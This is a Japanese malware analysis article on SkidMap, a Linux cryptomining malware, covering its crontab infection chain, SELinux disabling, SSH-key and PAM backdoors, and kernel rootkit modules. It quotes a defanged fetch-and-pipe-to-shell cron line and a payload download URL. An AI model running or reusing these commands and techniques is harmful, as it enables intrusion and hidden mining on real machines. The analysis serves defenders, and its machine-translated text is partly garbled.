Linux マルウェア SkidMap 分析を実行する方法

仮想通貨マイニング マルウェアは依然として蔓延する脅威です。また、サイバー犯罪者は、モバイル デバイス、Unix および Unix 類似システムからサーバーやクラウド環境に至るまで、マイニング マルウェアをさらに悪用するための新しいプラットフォームや手法をますます模索しています。

攻撃者は、マルウェアの検出を阻止する能力を向上させ続けています。たとえば、マルウェアにウォッチドッグ コンポーネントをバンドルして、感染したマシンで違法な暗号通貨マイニング活動が継続するようにしたり、LD_PRELOAD ベースのルートキットを利用してコンポーネントをシステムで使用できなくしたりする Linux ベースのシステムが検出されました。

SkidMap と呼ばれる Linux マルウェアが最近発見されたことは、仮想通貨マイニングの脅威がますます巧妙化する傾向を示しています。このマルウェアは、悪意のあるカーネル モジュールをロードして検出されにくくする方法で動作するため、注目を集めています。

これらのカーネル モード ルートキットは、ユーザー モード ルートキットよりも検出が難しいだけでなく、攻撃者が影響を受けるシステムにアクセスするために使用される可能性もあります。 Skidmap には、システム上のすべてのユーザー アカウントへのアクセスを許可するマスター パスワードを設定する機能があります。 SkidMap のルーチンの多くは root アクセスを必要とし、SkidMap が使用する攻撃ベクトル (エクスプロイト、設定ミスなど) は、攻撃者にシステムへの root アクセスまたは管理アクセスを与えるものと同じである可能性があります。

Skidmap 感染チェーン

マルウェアは、以下に示すように、crontab 経由でターゲット コンピュータに自身をインストールします。スクリプト pm.sh はマスター バイナリ「pc」をダウンロードします:

*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh

「pc」バイナリの実行後、影響を受けるマシンのセキュリティ設定を弱める変更が加えられます。ファイル /usr/sbin/setenforce が存在する場合、コマンド setenforce 0 を使用してマルウェアを実行できます。システムに /etc/selinux/config ファイルがある場合は、selinux=disabled および selinux=targeted コマンドのコマンドがファイルに書き込まれます。 1 つ目の方法は、selinux ポリシーを無効にするか、ロードされないようにすることです。2 つ目は、指定されたプロセスが制限されたドメインで実行されるように設定することです。

SkidMap は、バイナリにそのハンドラーの公開キーを認証に必要なキーが含まれるauthorized_keys ファイルに追加させることで、バックドアも提供します。

SkidMap は、バックドアを使用する以外に、攻撃者がマシンに侵入できる別の方法を提供します。このマルウェアは、システムの pam_unix.so ファイル (標準の Unix 認証を担当するモジュール) を独自の悪意のあるバージョン (backdoor.linux.pamdor.a として検出される) に置き換えます。図 2 に示すように、この悪意のある pam_unix.so ファイルは任意のユーザーの特定のパスワードを受け入れるため、攻撃者はコンピューター上に任意のユーザーとしてログインできます。

SkidMap Cryptocurrency

「pc」バイナリは、感染したシステムのオペレーティング システムが Debian であるか rhel/centos であるかをチェックします。

Debian ベースのシステムの場合、暗号通貨マイナーのペイロードが /tmp/miner2 にドロップされます。 centos/rhel システムの場合、URL hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz から暗号通貨マイナーとその複数のコンポーネントを含む tar ファイルをダウンロードし、解凍します。それをインストールしてください。

SkidMap その他の悪意のあるコンポーネント

悪意のあるアクティビティをさらに難読化し、確実に実行を継続するように設計されたマルウェア コンポーネント:

1. 擬似「rm」バイナリ: tar ファイルに含まれるコンポーネントの 1 つは、元のファイルを置き換える疑似「rm」バイナリです (rm は、ファイルを削除するコマンドとしてよく使用されます)。このファイルは、ファイルをダウンロードして実行する悪意のある cron ジョブをセットアップします。

kaudited をインストールする場合は、/usr/bin/kaudited ファイルをインストールしてください。感染したマシン上のこのバイナリには、複数のロード可能なカーネル モジュール (LKM) がインストールされます。感染したコンピュータがカーネル モード ルートキットに遭遇したときにクラッシュするのを防ぐために、特定のカーネル バージョンに対して異なるモジュールを使用します。 kaudited バイナリは、ウォッチドッグ コンポーネントも削除します。

3. iproute、このモジュールはシステム コール getdents (通常はディレクトリの内容を読み取るために使用されます) をフックして、特定のファイルを非表示にします。

4. netlink は、ネットワーク トラフィックと CPU 関連の統計を偽造し、感染したマシンの CPU 負荷が常に非常に低いように見せます。

ソリューション

SkidMap は、かなり高度な方法を使用して、SkidMap とそのコンポーネントが検出されないようにします。 SkidMap はさまざまな方法で影響を受けるマシンにアクセスし、すでに回復または駆除されたシステムに再感染することができます。

仮想通貨のマイニングはサーバーやワークステーションのパフォーマンスに影響を与え、出費の増加につながるだけでなく、ビジネスに混乱をもたらす可能性もあります。多くのエンタープライズ環境で Linux が使用されていることを考慮すると、ユーザーと管理者は、システムとサーバーを常に最新の状態に保ち、パッチを適用し、未検証のサードパーティのリポジトリに注意し、悪意のあるファイルやプロセスが実行されないようにする必要があります。

IoC

以上がLinux マルウェア SkidMap 分析を実行する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。